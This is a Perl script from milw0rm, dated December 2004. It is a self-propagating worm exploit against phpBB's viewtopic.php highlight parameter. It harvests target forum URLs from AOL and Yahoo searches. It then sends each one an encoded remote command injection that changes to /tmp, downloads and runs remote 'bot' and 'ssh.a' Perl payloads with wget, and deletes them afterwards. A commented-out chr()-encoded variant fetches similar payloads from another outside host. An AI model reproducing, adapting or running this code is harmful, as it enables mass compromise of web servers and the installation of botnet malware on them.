#/usr/bin/perl use IO::Socket; use LWP::Simple; @vul = ""; $a=0; $numero = int rand(999); $site = "search.aol.com"; $procura = "viewtopic.php%3Ft%3D$numero"; ###################################### for($n=0;$n<90;$n += 10){ $sock = IO::Socket::INET->new(PeerAddr=>"$site",PeerPort=>"80",Proto=>"tcp") or next; print $sock "GET /aolcom/search?q=$procura&Stage=0&page=$n HTTP/1.0\n\n"; @resu = <$sock>; close($sock); $ae = "@resu"; while ($ae=~ m/.*?<\/a>/){ $ae=~ s/.*?<\/a>/$1/; $uber=$1; if ($uber !~/translate/) {if ($uber !~ /cache/) {if ($uber !~ /"/) {if ($uber !~ /google/) {if ($uber !~ /216/) {if ($uber =~/http/) {if ($uber !~ /start=/) { if ($uber =~/&/) { $nu = index $uber, '&'; $uber = substr($uber,0,$nu); } $vul[$a] = $uber; $a++; }}}}}}}}} ########################## for($cadenu=1;$cadenu <= 99; $cadenu +=10){ @cade = get("http://cade.search.yahoo.com/search?p=$procura&ei=UTF-8&fl=0&all=1&pstart= 1&b=$cadenu") or next; $ae = "@cade"; while ($ae=~ m/.*?<\/em>/){ $ae=~ s/(.*?)<\/em>/$1/; $uber=$1; $uber =~ s/ //g; $uber =~ s///g; $uber =~ s/<\/b>//g; $uber =~ s///g; if ($uber =~/&/) { $nu = index $uber, '&'; $uber = substr($uber,0,$nu); } $vul[$a] = $uber; $a++ }} ######################### #$cmd = '&highlight=%2527%252esystem(chr(99)%252echr(100)%252echr(32)%252echr(47) %252echr(116)%252echr(109)%252echr(112)%252echr(59)%252echr(119)%252echr(103)%2 52echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252e chr(46)%252echr(116)%252echr(101)%252echr(110)%252echr(104)%252echr(97)%252echr (115)%252echr(101)%252echr(117)%252echr(115)%252echr(105)%252echr(116)%252echr (101)%252echr(46)%252echr(99)%252echr(111)%252echr(109)%252echr(47)%252echr(98)% 252echr(111)%252echr(116)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252 echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr (98)%252echr(111)%252echr(116)%252echr(46)%252echr(116)%252echr(120)%252echr(116) %252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252 echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(116)%252echr(101)%252echr (110)%252echr(104)%252echr(97)%252echr(115)%252echr(101)%252echr(117)%252echr(115) %252echr(105)%252echr(116)%252echr(101)%252echr(46)%252echr'.'(99)%252echr(111)%25 2echr(109)%252echr(47)%252echr(119)%252echr(111)%252echr(114)%252echr(109)%252echr (46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101) %252echr(114)%252echr(108)%252echr(32)%252echr(119)%252echr(111)%252echr(114)%25 2echr(109)%252echr(46)%252echr(116)%252echr(120)%252echr(116))%252e%2527'; $cmd = '&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd /tmp;wget server.org/pdf/bot;perl bot;wget server.org/pdf/ssh.a;perl ssh.a;rm -rf ssh.*;rm -rf bot*%3B% 20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72 %75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5 D%29.%2527'; $b = scalar(@vul); for($a=0;$a<=$b;$a++) { $sitevul = $vul[$a].$cmd; if($sitevul !~/http/){ $sitevul = 'http://'.$sitevul; } $res = get($sitevul) or next; } # milw0rm.com [2004-12-25]

Query Builder